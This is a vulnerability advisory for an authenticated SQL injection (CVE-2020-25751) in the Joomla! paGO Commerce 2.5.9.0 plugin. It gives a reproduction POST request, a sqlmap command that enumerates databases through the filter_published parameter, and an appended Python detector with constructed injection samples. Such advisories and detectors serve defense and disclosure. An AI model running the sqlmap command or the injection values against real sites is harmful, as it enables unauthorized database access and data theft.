    (CVE-2020-25751) Joomla! paGO Commerce 2.5.9.0 SQL injection vulnerability
    ==========================================================================
    
    1. Vulnerability overview
    -------------------------
    
    Joomla! is an open-source, cross-platform content management system (CMS)
    developed in PHP and MySQL by the US-based Open Source Matters team.
    
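    Version 2.5.9.0 of the Joomla! paGO Commerce plugin contains a SQL injection
    vulnerability. It stems from the `filter_published` parameter of
    `administrator/index.php?option=com_pago&view=comments`. An attacker can
    exploit it to execute unauthorized SQL commands.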
    
    2. Affected versions
    --------------------
    
    Joomla! paGO Commerce 2.5.9.0
    
    3. Reproduction
    ---------------
    
        POST /joomla/administrator/index.php HTTP/1.1
        Host: www.0-sec.org:8000
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
        Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
        Accept-Encoding: gzip, deflate
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 154
        Origin: http://localhost
        Connection: close
        Referer: http://www.0-sec.org/joomla/administrator/index.php?option=com_pago&view=comments
        Cookie: 4bde113dfc9bf88a13de3b5b9eabe495=sp6rp5mqnihh2i323r57cvesoe; crisp-client%2Fsession%2F0ac26dbb-4c2f-490e-88b2-7292834ac0e9=session_a9697dd7-152d-4b1f-a324-3add3619b1e1
        Upgrade-Insecure-Requests: 1
    
        filter_search=&limit=10&filter_published=1&task=&controller=comments&boxchecked=0&filter_order=id&filter_order_Dir=desc&5a672ab408523f68032b7bdcd7d4bb5c=1
    
    **sqlmap poc**:
    
    `sqlmap -r www.0-sec.org --dbs --risk=3 --level=5 --random-agent -p filter_published`
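
For detection, the check below flags requests to the administrator endpoint whose `filter_published` value is not a plain integer. It is an added example, not code from the original page or from the paGO Commerce project; the function name, the integer allow-list and the constructed sample bodies are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

ADMIN_PATH = "/administrator/index.php"
PARAM = "filter_published"
# Assumption: a legitimate value is empty or a short signed integer,
# like the filter_published=1 in the request on this page.
ALLOWED = re.compile(r"-?[0-9]{1,3}")


def suspicious_values(url, body=""):
    """Return every filter_published value that is not a plain integer.

    Both the query string and a form-encoded POST body are inspected, and
    every occurrence of the parameter is checked, because a duplicate can
    hide a payload behind a benign first value.
    """
    parts = urlsplit(url)
    if not parts.path.endswith(ADMIN_PATH):
        return []  # out of scope: not the Joomla! administrator endpoint
    values = []
    for encoded in (parts.query, body):
        # parse_qs percent-decodes and turns '+' into a space, so encoded
        # input is compared in its decoded form.
        values += parse_qs(encoded, keep_blank_values=True).get(PARAM, [])
    return [v for v in values if v and not ALLOWED.fullmatch(v)]


# Body of the request shown on this page (benign value, token omitted).
PAGE_BODY = (
    "filter_search=&limit=10&filter_published=1&task=&controller=comments"
    "&boxchecked=0&filter_order=id&filter_order_Dir=desc"
)
# Constructed samples: a non-integer value and a duplicated parameter.
CONSTRUCTED = [
    "filter_published=1+AND+1%3D1&controller=comments",
    "filter_published=1&filter_published=1%27",
]

if __name__ == "__main__":
    for sample in [PAGE_BODY, *CONSTRUCTED]:
        print(suspicious_values("/joomla/administrator/index.php", sample))
```

The same allow-list, applied server-side before the value reaches the query, is the corresponding input-validation control.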
    
    Reference link
    --------------
    
    > https://www.nmmapper.com/st/exploitdetails/48811/43057/joomla-pago-commerce-2590-sql-injection-authenticated/
    
    